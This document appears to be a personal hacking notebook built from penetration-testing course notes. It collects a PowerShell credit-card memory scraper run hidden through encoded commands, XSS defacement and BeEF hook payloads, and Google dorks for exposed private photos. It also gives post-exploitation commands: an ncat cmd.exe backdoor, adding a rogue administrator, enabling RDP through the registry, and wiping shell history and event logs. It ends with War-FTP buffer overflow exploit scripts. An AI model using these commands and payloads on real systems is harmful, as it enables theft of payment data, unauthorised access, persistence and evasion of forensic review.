Original Source & Inspiration: http://www.shellntel.com/blog/2015/9/16/powershell-cc-memory-scraper

* Non-resident credit card memory scraper, now improved the obfuscation technique using -EncodedCommand 
* One-liner PowerShell script/downloader essentially does its dirty work without any additional malware corpus on the host
* Great for penetration tests of various merchants or for PCI-DSS audit compliance

• ​​(1) Setup a server with the Memory Scraper download
• (2) Encode the PowerShell memory scraper using -EncodedCommand (Base64)
• (3) Allow execution of scripts on the host via powershell.exe Set-ExecutionPolicy Unrestricted
• (4) Execute the obfuscated script on the host​ that downloads the memory scraper and parses the memory process of notepad.exe for credit card Track1/2 data with Luhn algorithm

 -NoP -NonI -W Hidden -Enc 

Source: Python for Black Hat

I. tcp_client.py (base64-encoded exfiltrated data)
1. Create a socket object
2. Connect the client
3. Send some Base64-encoded data
4. Receive data response =
II. tcp_server.py 0.0.0.0:9999 (original and decoded)
1. Send something
2. Print out what the client sends
3. Send back a packet
4. Spin up our client thread to handle incoming data

[inurl:.com/search.asp]

1. Test other website and input the code <h1>TEST</h1> or <script>alert('x');</script> on search box.
2. The result was show a heading title, but I'm not sure, then
3. Check the selection source to make sure it's not a bold
4. Check if the query was processed by server without filtering

Test:
a. <script>alert('x');</script>​
b. <script>document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibility:visible;><h1>THIS SITE WAS HACKED</h1></div>";</script>
c. <h1>TEST</h1>

Beef XSS Query: Vulnerable XSS
<script type=text/javascript src=http://127.0.0.1:3000/hook.js></script>

Sample of the XSS page:

http://www.xss_vulnerable_website/search.asp?keyword=<script type=text/javascript src=http://127.0.0.1:3000/hook.js></script>&x=0&y=0

Course: Dean Pompilio on "Social Engineering and Manipulation" at Cybrary

Social Engineering (SE) Tools:

*Cewl
Use Cewl’s spidering process to generate a word list for password cracking

*Cupp
This tool allows you to generate a list of possible passwords to use in the Dictionary file.
cupp.py -l
cupp.py -

*Creepy
Account enumerator tool that does account harvesting

*Dradis
SE platform

*Google
[site: edu|org + inurl:"faculty_login.asp | .php"
intitle:"Index Of" intext:"iCloud Photos" ORintext:"My Photo Stream" OR intext:"Camera Roll"
intitle:"Index of" "DCIM"
inurl"CrazyWWWBoard.cgi intext:"detailed debugging information"
intitle:"Retina Report" intext:"Confidential Information"]

*Maltego
Data visualization tool

*Recon-NG
show modules
use netcraft
set  source [ANY WEBSITE NAME]
show hosts
use recon/hosts-hosts/resolve
run
use discovery/info_disclosure/interesting_files
use recon/domains-hosts/brute_hosts
use ipinfodb
use pgp
del contactds 1-12
use recon/contacts-credentials/pwnedlist
use reporting/html

*Scythe Framework
Account enumerator tool that does account harvesting. 

*Creepy
Allows to do geolocation for a target by using various social networking platforms to track individuals.

*Shodan
Crawls the Internet and identifies IP addresses that have a service running. Then it does a banner grab of the service that is running, and it saves the banner information. 

Social Engineering Toolkit (SET) [*use TinyURL to obfuscate links]

Course:  Joe Perry on "Post Exploitation Hacking" at Cybrary

Linux Tracks
~/.bash-history
cp ~/.bash-history ~/.bash-history-save
rm ~/.bash-history OR /dev/null > ~/.bash-history

Linux Timestamps​
•touch -t '1 May 2005 10:22' file

Windows Event Logs
•They’re managed on the command line by wevtutil
Wevtutil –el output
Wevtutil -cl

Course:  Joe Perry on "Post Exploitation Hacking" at Cybrary
​
I. Remote Desktop Protocol - RDP
*Windows native RDP 
*Chrome RDP (or any other third-party RDP)

Setting up the Windows Firewall
Netsh advfirewall firewall set rule group=“remote desktop” new enable=Yes

•Netsh – network administration tool
•Advfirewall – identifies that you’re working with the windows “advanced” firewall
•Firewall – specifies that this is an actual firewall operation, not something else governed by advfirewall
•Set rule group=“remote desktop” – assigning a value to that specific group
•Enable=Yes – allow rdp connections

Editing the registry key
Reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f

•Reg add – editing a registry to put something new into it
•“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” – the actual key we’re going to be messing with.
•/v fDenyTSConnections – the field (“Value”) we’re putting in
•/t REG_DWORD – the data type (Int/DWORD/string/etc)
•/d 0 – the actual value correspondent to the field label
•/f – force 

II. Ncat Backdoor
ncat –lkp 51000 –e “cmd.exe”

•Lkp – listen persistently on port 51000
•-e “cmd.exe” – when you receive a connection, execute this command and take control of the IO pipes

III. New User
net user /add Acct4 ThisPassW0rd
net localgroup Administrators /add Acct4

IV. Scheduled arrival
Schtasks
At 

Course:  Joe Perry on "Post Exploitation Hacking" at Cybrary
​​
Workstation and Network Analysis 

I. Linux
A. Workstation
•Ifconfig
•Netstat (+netstat -g/ -r/ -i/ -s)
•Arp
•/etc/nsswitch.conf
•/etc/resolve.conf

B. Network
•Ping/traceroute •Ping –t 1 <target> (Identify your default gateway)
•Nmap
•P0f [passive OS fingerprinting]
•Tcpdump
•Tshark

II. Windows
A. Workstation
•Ipconfig
•Netstat
•Arp
•Net * (there’s a lot)

B. Network
•nslookup
•Tracert
net *  •Accounts; •Config; •Group; •Session; •Statistics; •View; •Start
Wmic [Windows Management Instrumentation] 
E.g., Wmic Useraccount
E.g., Wmic startup get caption,command

Course:  Joe Perry on "Post Exploitation Hacking" at Cybrary
​
I. Ethernet Header:
•Src: Vmware_22:dd:ce (00:0c:29:22:dd:ce), Dst: Vmware_ff:1f:72 (00:50:56:ff:1f:72)
•Destination: Vmware_ff:1f:72 (00:50:56:ff:1f:72)
•Address: Vmware_ff:1f:72 (00:50:56:ff:1f:72)
•        .... ..0. .... .... .... .... = LG bit: Globally unique address (factory default)
•        .... ...0 .... .... .... .... = IG bit: Individual address (unicast)

II. IP Header
•Internet Protocol Version 4, Src: 192.168.129.128 (192.168.129.128), Dst: 31.13.71.128 (31.13.71.128)
•    Version: 4    Header length: 20 bytes   
•Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00: Not-ECT (Not ECN-Capable Transport))
•        0000 00.. = Differentiated Services Codepoint: Default (0x00)
•        .... ..00 = Explicit Congestion Notification: Not-ECT (Not ECN-Capable Transport) (0x00)
•    Total Length: 40    Identification: 0x0364 (868)
•    Flags: 0x02 (Don't Fragment)
•        0... .... = Reserved bit: Not set
•        .1.. .... = Don't fragment: Set
•        ..0. .... = More fragments: Not set
•    Fragment offset: 0    Time to live: 64    Protocol: TCP (6)
•    Header checksum: 0x8eb6 [validation disabled]
•        [Good: False]
•        [Bad: False]
•    Source: 192.168.129.128 (192.168.129.128)    Destination: 31.13.71.128 (31.13.71.128)
•    [Source GeoIP: Unknown]    [Destination GeoIP: Unknown]

III. TCP header
•Transmission Control Protocol, Src Port: 44277 (44277), Dst Port: https (443), Seq: 2537, Ack: 19459, Len: 0
•Source port: 44277 (44277)    Destination port: https (443)
•Sequence number: 2537    (relative sequence number)    Acknowledgment number: 19459    (relative ack number)
•    Header length: 20 bytes
•    Flags: 0x010 (ACK)
•        000. .... .... = Reserved: Not set
•        ...0 .... .... = Nonce: Not set
•        .... 0... .... = Congestion Window Reduced (CWR): Not set
•        .... .0.. .... = ECN-Echo: Not set
•        .... ..0. .... = Urgent: Not set
•        .... ...1 .... = Acknowledgment: Set
•        .... .... 0... = Push: Not set
•        .... .... .0.. = Reset: Not set
•        .... .... ..0. = Syn: Not set
•        .... .... ...0 = Fin: Not set
•    Window size value: 65160
•Checksum: 0xa8d0 [validation disabled]

​IV. UDP Header
•User Datagram Protocol, Src Port: db-lsp-disc (17500), Dst Port: db-lsp-disc (17500)
•    Source port: db-lsp-disc (17500)
•    Destination port: db-lsp-disc (17500)
•    Length: 122
•    Checksum: 0x5b02 [validation disabled]
•        [Good Checksum: False]
•        [Bad Checksum: False]

Course:  Georgia Weidman on "Advanced Penetration Testing" at Cybrary

*Give the program too much input in the username (USER) field
*Saved return pointer will be overwritten with our attack controlled input

I. Exploit Skeleton -> War-FTP 1.65 USER Buffer Overflow

#!/usr/bin/python
import socket
buffer = "A" * 1100
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.5.44',21))*
response = s.recv(1024)
print response
s.send('USER ' + buffer + '\r\n')
response = s.recv(1024)
print response
s.send('PASS PASSWORD\r\n')
s.close()

II. Immunity Debugger -> Attach to the Process

III. Mona.py
A exploit development plugin for Immunity Debugger and WinDGB by the Corelan Team.

Setup logging:!mona config -set workingfolder C:\logs\%p

Identifying the Overwrite​
!mona pattern_create 1100

IV. Mona Findmsp
Use !mona findmsp to find all instances of part or all of the cyclic pattern in memory

Finds if the pattern is in the registers (i.e. EIP) and the offset from the beginning of the pattern​

Verifying Offsets
#!/usr/bin/python
import socket
buffer = "A" * 485 + "B" * 4 + "C" * 611
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.20.10',21))
response = s.recv(1024)
print response
s.send('USER ' + buffer + '\r\n')
response = s.recv(1024)
print response
s.send('PASS PASSWORD\r\n')
s.close()